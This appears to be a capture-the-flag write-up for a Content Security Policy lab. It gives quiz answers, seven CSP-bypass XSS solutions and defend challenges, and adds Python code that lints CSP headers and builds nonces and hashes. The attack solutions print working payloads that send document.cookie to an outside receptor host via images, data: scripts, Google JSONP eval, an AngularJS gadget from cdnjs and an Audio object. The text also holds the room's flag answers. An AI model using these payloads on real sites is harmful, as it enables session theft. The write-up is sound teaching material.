Content Security Policy

    • What does CSP stand for?

    Answer : Content Security Policy

    • CSP is designed to add an additional layer of protection against the exploitation of what vulnerability?

    Answer : XSS

    • In which part of the HTTP response does the server usually send the policy to the client?

    Answer : header

    • Which directive can we use to restrict the loading of scripts on our website?

    Answer : script-src

    • Which directive can we use to restrict the loading of videos on our website?

    Answer : media-src

    • If we want to log CSP violations, which directive do we need to set to have the browser report violations to us?

    Answer : report-uri

    • If we want to allow script execution via functions such as eval() from already trusted scripts, what source should we allow in our script-src directive?

    Answer : 'unsafe-eval'

    • What directive-source combination should we add to our policy if we want to specifically block all JavaScript content from running on our website?

    Answer : script-src 'none'

    • What hashing algorithm can you use to verify the scripts being loaded? (Without the numbers)

    Answer : SHA

    • Can you include the URLs of the permitted scripts directly in your security policy? (Yes / No)

    Answer : Yes

    • If Ajax/XHR requests are blocked, can we still exfiltrate sensitive information? (Yes / No)

    Answer : Yes

    • I have deployed the CSP Sandbox machine.

    No Answer.

    • Flag for attack-1

    First, set up an HTTP request receptor (https://beeceptor.com/console/csptest) as the URL to exfiltrate the data to.

    Then use https://csp-evaluator.withgoogle.com/ to get the CSPs with the IP.

    The CSP from CSP evaluator :

    default-src * 'unsafe-inline';

    I tried

    <script>alert(1)</script> and it works.

    Then,

    <BODY ONLOAD=fetch(`https://csptest.free.beeceptor.com/${document.cookie}`)>

    But it was not working. I changed my script tag to load a crafted image calling the exfiltration URL with the cookies appended :

    <script>new Image().src="https://csptest.free.beeceptor.com?c="+document.cookie;</script>

    On beeceptor :

    GET /?c=flag=THM{Th4t_W4s_Pr3tty_3asy}

    Answer : THM{Th4t_W4s_Pr3tty_3asy}

    • Flag for attack-2

    For the second question, the CSP was :

    default-src *;
    style-src 'self';
    script-src data:

    I tried a default working XSS attack :

    <script src="data:application/javascript,alert(1)"></script>

    Then encoded in base64 the fetch call :

    fetch('https://csptest.free.beeceptor.com/${document.cookie}')
    ZmV0Y2goJ2h0dHBzOi8vY3NwdGVzdC5mcmVlLmJlZWNlcHRvci5jb20vJHtkb2N1bWVudC5jb29raWV9Jyk=
    <script src="data:;base64,ZmV0Y2goImh0dHBzOi8vY3NwdGVzdC5mcmVlLmJlZWNlcHRvci5jb20vJHtkb2N1bWVudC5jb29raWV9Iik="></script>
    This gives me the flag :

    /flag=THM%7BUs1ng_data:_1snt_Any_S4fer%7D

    Answer : THM{Us1ng_data:_1snt_Any_S4fer}

    • Flag for attack-3

    I got the CSP :

    default-src 'none';
    img-src *;
    style-src 'self';
    script-src 'unsafe-inline'

    I tried :

    "/><script>alert(1337);</script>

    This one works, so I could then craft the following XSS :

    <script>new Image().src="https://csptest.free.beeceptor.com?c="+document.cookie;</script>
    /?c=flag=THM{Th4ts_N0t_4n_1m4ge!!}

    Answer : THM{Th4ts_N0t_4n_1m4ge!!}

    • Flag for attack-4

    CSP :

    default-src 'none';
    style-src * 'self';
    script-src 'nonce-abcdef'
    "/><script nonce="abcdef">alert(1337);</script>
    It works because nonce-abcdef allows the script to run.

    Then, with the extraction of cookies :

    <link id="test" rel=stylesheet href="" /><script nonce="abcdef">document.getElementById('test').href="https://csptest.free.beeceptor.com/" + document.cookie;</script>  

    /flag=THM%7BStyle_Y0ur_W3bs1teS%7D 

    Answer : THM{Style_Y0ur_W3bs1teS}

    • Flag for attack-5

    CSP :

    default-src 'none';
    style-src 'self';
    img-src *;
    script-src 'unsafe-eval' *.google.com

    I checked the explanations :

    script-src    
    Host whitelists can frequently be bypassed. Consider using 'strict-dynamic' in combination with CSP nonces or hashes.

    'unsafe-eval'
    'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().

    error *.google.com
    www.google.com is known to host JSONP endpoints which allow to bypass this CSP.

    From this, I googled JSONP and found an interesting file, jsonp.txt, on GitHub :

    https://github.com/zigoo0/JSONBee in jsonp.txt

    With those examples, I crafted my script tag XSS :

    <script src="//accounts.google.com/o/oauth2/revoke?callback=eval(document.location='https://csptest.free.beeceptor.com/'.concat(document.cookie))"></script> 
    /flag=THM%7BN0_JSONP_D0mains_Plz%7D  

    Answer : THM{N0_JSONP_D0mains_Plz}

    • Flag for attack-6

    CSP :

    default-src 'none';
    img-src *;
    style-src 'self';
    script-src 'unsafe-eval' cdnjs.cloudflare.com

    Searching for "cdn cloudflare csp bypass" : https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass

    <script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
    <div ng-app ng-csp>
    {{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
    </div>

    "><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>

    "><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
    <div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>

    I tried a console.log(1) call :

    <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
    <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };console.log(1);//');}} </div>

    It works; I then followed with the cookie exfiltration :

    <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
    <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };document.location="https://csptest.free.beeceptor.com/".concat(document.cookie);//');}} </div>
     /flag=THM%7BTrust_N0_CDN%7D 

    Answer : THM{Trust_N0_CDN}

    • Flag for attack-7

    CSP :

    default-src 'none';
    media-src *;
    style-src 'self';
    script-src 'self'

    XSS script :

    <script src="/'; new Audio('https://csptest.free.beeceptor.com/' + document.cookie); '"></script>
    /flag=THM%7BTh1s_4udio_S0unds_N1ce%7D  

    Answer : THM{Th1s_4udio_S0unds_N1ce}
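    The seven attack policies above share a handful of weak sources. The linter below is an added example, not part of the original write-up or the CSP Sandbox: it parses a CSP header value and flags the same things the evaluator output and the bypasses pointed at ('unsafe-inline', 'unsafe-eval', data:, wildcards, the JSONP and CDN hosts named above, a short fixed nonce, and wide-open img/style/media-src that serve as exfiltration channels even when XHR is blocked). RISKY_HOSTS and the nonce-length threshold are assumptions chosen for illustration.

```python
# Added example: a minimal CSP linter for the weaknesses seen in attack-1..7.
# RISKY_HOSTS and MIN_NONCE_CHARS are assumptions for illustration, not a standard.
RISKY_HOSTS = {"*.google.com", "www.google.com", "cdnjs.cloudflare.com"}
MIN_NONCE_CHARS = 16  # 128 bits of randomness base64-encoded is 22 characters

def parse_csp(policy: str) -> dict:
    """Split a CSP header value into {directive: [source, ...]}."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives

def lint_csp(policy: str) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    d = parse_csp(policy)
    findings = []
    # Scripts fall back to default-src when script-src is absent (attack-1).
    script = d.get("script-src", d.get("default-src", []))
    if "script-src" not in d:
        findings.append("script-src missing: scripts governed by default-src")
    if "'unsafe-inline'" in script:
        findings.append("script-src allows 'unsafe-inline' (attack-1, attack-3)")
    if "'unsafe-eval'" in script:
        findings.append("script-src allows 'unsafe-eval' (attack-5, attack-6)")
    if "data:" in script:
        findings.append("script-src allows data: URIs (attack-2)")
    if "*" in script:
        findings.append("script-src allows scripts from any host")
    for src in script:
        if src in RISKY_HOSTS:
            findings.append(f"script-src trusts {src}, which hosts JSONP/AngularJS")
        if src.startswith("'nonce-") and len(src) < len("'nonce-'") + MIN_NONCE_CHARS:
            findings.append(f"script-src nonce {src} is short and likely fixed (attack-4)")
    # Wildcard fetch channels let injected code exfiltrate data even when XHR is
    # blocked: images (attack-1/3), stylesheets (attack-4), audio (attack-7).
    for channel in ("img-src", "style-src", "media-src"):
        if "*" in d.get(channel, []):
            findings.append(f"{channel} * is an open exfiltration channel")
    return findings

# Constructed sample: the attack-5 policy from the write-up.
ATTACK_5 = "default-src 'none'; style-src 'self'; img-src *; script-src 'unsafe-eval' *.google.com"

if __name__ == "__main__":
    for finding in lint_csp(ATTACK_5):
        print("-", finding)
```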

    TASK 8 : CSP Sandbox :: Defend challenges
    • What is the flag for defend-1?

    CSP :

    script-src 'self'

    You have successfully defended the server against attackers!
    Here's your reward: THM{N0_0utside_S0urces}

    Answer : THM{N0_0utside_S0urces}

    • What is the flag for defend-2?

    CSP :

    script-src 'nonce-ae3b00'

    You have successfully defended the server against attackers!
    Here's your reward: THM{M4k3_Sure_Y0ur_N0nce_1s_R4ndom}

    Answer : THM{M4k3_Sure_Y0ur_N0nce_1s_R4ndom}

    • What is the flag for defend-3?

    Using https://report-uri.com/home/hash to get the hash of the script console.log("__defend-3_REAL=true") :

    CSP :

    script-src 'sha256-8gQ3l0jVGr5ZXaOeym+1jciekP8wsfNgpZImdHthDRo='

    You have successfully defended the server against attackers!
    Here's your reward: THM{Hash_Y0ur_1nl1ne_Scr1pts}

    Answer : THM{Hash_Y0ur_1nl1ne_Scr1pts}
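    Defend-2 and defend-3 rely on a nonce and a script hash. The helpers below are an added example, not code from the write-up or the CSP Sandbox: they generate a fresh random nonce per response and compute the 'sha256-…' source for an inline script body the way the report-uri tool did, so the header can be emitted from application code instead of pasted by hand. Function names are my own; the hash covers the exact text between the script tags, so hashing the defend-3 script byte for byte should reproduce the value shown above.

```python
# Added example: build a script-src from a random nonce and inline-script hashes.
import base64
import hashlib
import secrets

def script_hash(inline_script: str, algo: str = "sha256") -> str:
    """CSP hash-source for an inline script: base64 of the digest of the exact
    text between <script> and </script>, whitespace included."""
    digest = hashlib.new(algo, inline_script.encode("utf-8")).digest()
    return f"'{algo}-{base64.b64encode(digest).decode()}'"

def fresh_nonce(nbytes: int = 16) -> str:
    """A per-response nonce: 128 bits from the OS CSPRNG, base64-encoded.
    Generate a new one for every response; a fixed value like abcdef is guessable."""
    return f"'nonce-{base64.b64encode(secrets.token_bytes(nbytes)).decode()}'"

def build_script_src(inline_scripts=(), nonce=None, hosts=("'self'",)) -> str:
    """Assemble the script-src directive from hosts, an optional nonce and hashes."""
    sources = list(hosts)
    if nonce:
        sources.append(nonce)
    sources += [script_hash(body) for body in inline_scripts]
    return "script-src " + " ".join(sources)

if __name__ == "__main__":
    # The defend-3 inline script from the write-up, hashed the same way.
    print(build_script_src(['console.log("__defend-3_REAL=true")']))
    print(build_script_src(nonce=fresh_nonce()))
```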